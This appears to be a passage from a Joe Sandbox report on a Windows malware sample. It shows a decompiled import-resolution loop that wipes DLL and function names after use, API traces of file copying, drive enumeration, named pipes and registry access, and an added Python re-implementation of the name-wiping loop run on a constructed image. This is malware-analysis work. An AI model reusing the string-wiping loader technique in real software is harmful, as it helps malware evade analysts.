						_t11 = _t28 + 2; // 0x2: skip IMAGE_IMPORT_BY_NAME.Hint to reach the function name
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) { // by-name import only: an ordinal has no string to wipe
							memset(_t49, 0, lstrlenA(_t49)); // zero the function name as well
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4; // write the resolved address into the matching IAT slot
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f; // ERROR_PROC_NOT_FOUND (127): GetProcAddress failed
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e; // ERROR_MOD_NOT_FOUND (126): LoadLibraryA failed
				goto L22;
			}
			(per-line instruction addresses of the decompiled function, 0x00401389 to 0x00401483; the address column is not aligned with the lines above)

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
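Added example, not part of the Joe Sandbox report and not code from the sample: the import-resolution loop decompiled above (E00401389) re-implemented in Python against a constructed in-memory PE32 image, so its behaviour can be checked offline. It walks IMAGE_DIRECTORY_ENTRY_IMPORT, resolves each thunk by name (after the 2-byte Hint) or by ordinal, writes the IAT, zeroes every DLL and function name string after use, and returns 0x7e when a module cannot be loaded and 0x7f when a function cannot be found, as the original does. LoadLibraryA and GetProcAddress are replaced by callbacks; the image, the fake kernel32 export table and the addresses 0x7C802446 / 0x7C801000 are constructed for the example. One deliberate difference: ordinal imports are passed as entry & 0xFFFF (the documented GetProcAddress convention), where the decompiled listing runs the ordinal through the same +2 path as a name; the bounds check against SizeOfImage is also this example's own.

```python
"""Added example: the import-resolution loop of E00401389 re-implemented in
Python and run against a constructed PE32 image. Not code from the sample or
from the Joe Sandbox report."""
import struct

IMAGE_ORDINAL_FLAG32 = 0x80000000
ERROR_MOD_NOT_FOUND = 0x7E    # E00401389 returns this when LoadLibraryA fails
ERROR_PROC_NOT_FOUND = 0x7F   # ... and this when GetProcAddress fails


def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def _cstr(buf, off):
    return bytes(buf[off:buf.index(b"\0", off)]).decode("ascii")


def _wipe(buf, off):
    # memset(s, 0, lstrlenA(s)): overwrite the string in place, keep the terminator
    end = buf.index(b"\0", off)
    buf[off:end] = b"\0" * (end - off)


def resolve_imports(image, load_library, get_proc_address):
    """Walk the import directory of a mapped PE32 image (bytearray, base 0),
    fill the IAT through the two callbacks and zero each name after use.
    Returns 0, ERROR_MOD_NOT_FOUND or ERROR_PROC_NOT_FOUND like the original."""
    nt = _u32(image, 0x3C)                      # e_lfanew -> IMAGE_NT_HEADERS
    size_of_image = _u32(image, nt + 0x50)      # OptionalHeader.SizeOfImage
    desc = _u32(image, nt + 0x80)               # DataDirectory[IMPORT].VirtualAddress
    status = 0
    while desc and _u32(image, desc + 0x0C):    # a zero IMAGE_IMPORT_DESCRIPTOR.Name ends the list
        name_rva = _u32(image, desc + 0x0C)
        module = load_library(_cstr(image, name_rva))
        if module is None:
            return ERROR_MOD_NOT_FOUND
        _wipe(image, name_rva)                  # DLL name gone once the module is loaded
        lookup = _u32(image, desc) or _u32(image, desc + 0x10)   # OriginalFirstThunk, else FirstThunk
        iat = _u32(image, desc + 0x10)          # FirstThunk: where the addresses are written
        i = 0
        while lookup:
            entry = _u32(image, lookup + 4 * i)
            if entry == 0:
                break
            if entry & IMAGE_ORDINAL_FLAG32:
                target = entry & 0xFFFF         # import by ordinal
            elif entry + 2 < size_of_image:     # bounds check added in this example
                target = _cstr(image, entry + 2)  # IMAGE_IMPORT_BY_NAME.Name, after the 2-byte Hint
            else:
                target = None
            addr = get_proc_address(module, target) if target is not None else None
            if addr is None:
                status = ERROR_PROC_NOT_FOUND   # remembered; the loop moves on to the next DLL
                break
            if not entry & IMAGE_ORDINAL_FLAG32:
                _wipe(image, entry + 2)         # function name gone once resolved
            struct.pack_into("<I", image, iat + 4 * i, addr)
            i += 1
        desc += 0x14                            # sizeof(IMAGE_IMPORT_DESCRIPTOR)
    return status


def build_test_image():
    """Constructed PE32 image: one descriptor importing Sleep (by name) and
    ordinal 7 from KERNEL32.dll. Only the fields the resolver reads are set."""
    img = bytearray(0x500)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                      # e_lfanew
    img[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", img, 0x40 + 0x50, len(img))           # SizeOfImage
    struct.pack_into("<II", img, 0x40 + 0x80, 0x200, 0x28)       # import directory RVA, size
    struct.pack_into("<IIIII", img, 0x200, 0x300, 0, 0, 0x400, 0x340)  # OFT, stamp, fwd, Name, FT
    for rva in (0x300, 0x340):                                   # lookup table and IAT
        struct.pack_into("<III", img, rva, 0x410, IMAGE_ORDINAL_FLAG32 | 7, 0)
    img[0x400:0x40D] = b"KERNEL32.dll\0"
    struct.pack_into("<H", img, 0x410, 0)                        # Hint
    img[0x412:0x418] = b"Sleep\0"
    return img


# Constructed stand-ins for LoadLibraryA / GetProcAddress with made-up addresses.
FAKE_EXPORTS = {"kernel32.dll": {"Sleep": 0x7C802446, 7: 0x7C801000}}


def fake_load_library(name):
    return name.lower() if name.lower() in FAKE_EXPORTS else None


def fake_get_proc_address(module, target):
    return FAKE_EXPORTS[module].get(target)


def iat_entries(image, rva=0x340, count=2):
    return [_u32(image, rva + 4 * i) for i in range(count)]


if __name__ == "__main__":
    img = build_test_image()
    print(hex(resolve_imports(img, fake_load_library, fake_get_proc_address)),
          [hex(a) for a in iat_entries(img)], bytes(img[0x400:0x40D]), bytes(img[0x412:0x418]))
```

Applied to a dump taken after this loader has run, the walk finds only zero bytes where the DLL and function names were, because the function destroys each string as soon as it has used it: the IAT is populated, the strings that would explain it are not. That is why the names must be recovered from the image before its loader executes (here the 00400000 PE dump this function was decompiled from) rather than from the later 001C1000 dump.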
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
